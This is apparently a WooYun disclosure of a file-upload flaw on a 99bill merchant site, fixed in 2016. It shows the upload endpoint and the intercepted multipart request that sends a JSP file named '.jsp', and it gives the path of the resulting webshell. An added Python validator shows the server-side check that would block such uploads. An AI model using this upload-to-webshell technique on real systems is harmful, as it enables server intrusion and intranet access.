
Vulnerability Summary

Defect ID: wooyun-2016-0209324

Title: Upload getshell on a Kuaiqian (99bill) site

Vendor: Kuaiqian (99bill)

Author: Vern

Submitted: 2016-05-16 16:02

Fixed: 2016-07-01 09:00

Published: 2016-07-01 09:00

Vulnerability type: file upload leading to arbitrary code execution

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2016-05-16: Details sent to the vendor, awaiting vendor handling
2016-05-17: Vendor confirmed; details disclosed to the vendor only
2016-05-27: Details disclosed to core white hats and domain experts
2016-06-06: Details disclosed to regular white hats
2016-06-16: Details disclosed to intern white hats
2016-07-01: Details disclosed to the public

Brief description:

Upload getshell on a Kuaiqian (99bill) site, giving access to the intranet

Detailed description:

Upload point:

https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&contactEmail=123@163.com


[screenshot: 000.jpg]


Intercept the request while uploading the certificate photo.
For the image, select a JSP shell instead of a picture.

[screenshot: 1111.jpg]


POST /nspwebsite/common/nsp/applyBuy.do?method=uploadPic HTTP/1.1
Host: ipos.99bill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&contactEmail=111@163.com
Cookie: JSESSIONID=D5DDB0B8E8F182523A54BFBE1DD0A61D.tomcatServer456-3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------3238940103786
Content-Length: 7326
-----------------------------3238940103786
Content-Disposition: form-data; name="picF"; filename=".jsp


Shell obtained successfully
(a one-liner webshell)

[screenshot: 222.jpg]

Proof of vulnerability:

Shell:

https://ipos.99bill.com/nspwebsite/common/nsp/file/20160516154400407_.jsp


[screenshot: 搜狗截图20160516154431.jpg]


[screenshot: 11111111111.jpg]


Intranet access (the Tomcat server's JVM system properties, as read through the shell)

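The server-side check that would have stopped this upload, written as an added example for this page in Python (it is not the 99bill application's own Java code and not part of the report): it rejects a filename that is only an extension such as ".jsp", allows image extensions only, verifies the content's magic bytes against the declared type, and replaces the client's name with a server-generated one instead of the timestamp-plus-original-name pattern visible in the stored path. The allowlist and the magic-byte table are assumptions.

```python
import os
import secrets
from typing import Tuple

# Allowlist for a "certificate photo" field: extension -> magic bytes the
# content must start with (assumed set; extend to what the form really accepts).
ALLOWED_IMAGE_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, stored_name_or_reason).

    The vulnerable endpoint kept the client's extension and stored the file
    under the web root as <timestamp>_<client name>, so a file named ".jsp"
    became 20160516154400407_.jsp and Tomcat executed it. Here the client
    name is consulted only to reject it; the server chooses the stored name.
    """
    # Keep only the last path component and refuse control characters, so
    # "../x.jpg" or "x.jsp\x00.jpg" cannot influence what ends up on disk.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or any(ord(c) < 32 for c in base):
        return False, "invalid characters in filename"
    stem, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or not stem:
        # A bare ".jsp" has no stem; a name without a dot has no extension.
        return False, "filename must be of the form name.ext"
    if ext not in ALLOWED_IMAGE_TYPES:
        # Rejects .jsp, .jspx, .war and double extensions such as a.jpg.jsp.
        return False, f"extension '{ext}' is not an allowed image type"
    if not content.startswith(ALLOWED_IMAGE_TYPES[ext]):
        # Name says image, bytes say otherwise (e.g. JSP source named x.jpg).
        return False, "content does not match the declared image type"
    # Random server-chosen name; store it outside the web root and serve it
    # through a handler that never lets the container interpret it.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs mirroring the report: a JSP file named ".jsp" and a
    # genuine JPEG named 000.jpg.
    print(validate_upload(".jsp", b'<%@ page language="java" %>'))
    print(validate_upload("000.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"))
```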


Remediation:

Copyright notice: when reposting, please credit the source: Vern@WooYun


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability rank: 10

Confirmed: 2016-05-17 08:57

Vendor reply:

Thank you for your attention to Kuaiqian; we will arrange a fix immediately!

Latest status:

None yet

